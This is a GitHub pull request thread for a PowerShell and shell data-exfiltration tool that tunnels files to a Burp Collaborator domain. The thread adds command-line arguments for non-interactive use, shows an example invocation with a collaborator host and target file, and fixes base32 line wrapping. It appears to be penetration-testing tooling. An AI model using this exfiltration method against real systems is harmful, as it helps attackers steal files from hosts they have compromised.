Allow non-interactive usage of the scripts

jakekarnes42 opened the pull request:
Currently, the scripts require user interaction. They prompt for user input at the start of execution and won't continue unless the values are typed in. This could be a problem in the scenario where an attacker has command execution, but not an interactive shell. 

I've updated the scripts so that the two input values (domain and filename) can be provided at the command line when calling the script. If these are provided, the script won't require user interaction and it will complete on its own. 

I took care to ensure that the legacy behavior is maintained if the values are not provided at the command line.

jakekarnes42 committed:
collabDomain and exfilFile as PS params too

The $collabDomain and $exfilFile values can be passed as positional parameters. For example: .\tunnel.ps1 abc123.private-burp.com .\test.txt

If they aren't provided, it will still prompt in a very similar manner.

jakekarnes42 committed:
Provide domain and file as command line args

Allows for the collaborator domain and the file to exfiltrate to be provided as command-line arguments. If they are not provided, they are prompted for.

jakekarnes42 committed:
Update README.md for non-interactive usage

JacobReynolds commented on scripts/tunnel.ps1:
```diff
@@ -1,5 +1,12 @@
+param(
+    [parameter(
+        Mandatory = $true, HelpMessage="Burp Collaborator address")]
+    $collabDomain,
```
Do we want to make this line and line 7 non-mandatory? My powershell is rusty, but can they run this currently without providing the arguments?

jakekarnes42 replied:
Right, the script currently prompts the user to ask for these values. It's counter-intuitive, but if the params are marked as "Mandatory = $true" and they aren't provided, then powershell will automatically prompt the user to provide them. So by marking these as mandatory, that's how we maintain the existing behavior.

JacobReynolds replied:
Ahh, sweet. Nice!

jakekarnes42 committed:
Stop wrapping base32 data to fix #1

Unintuitively, the base32 program wraps at 76 characters. This update stops that behavior.
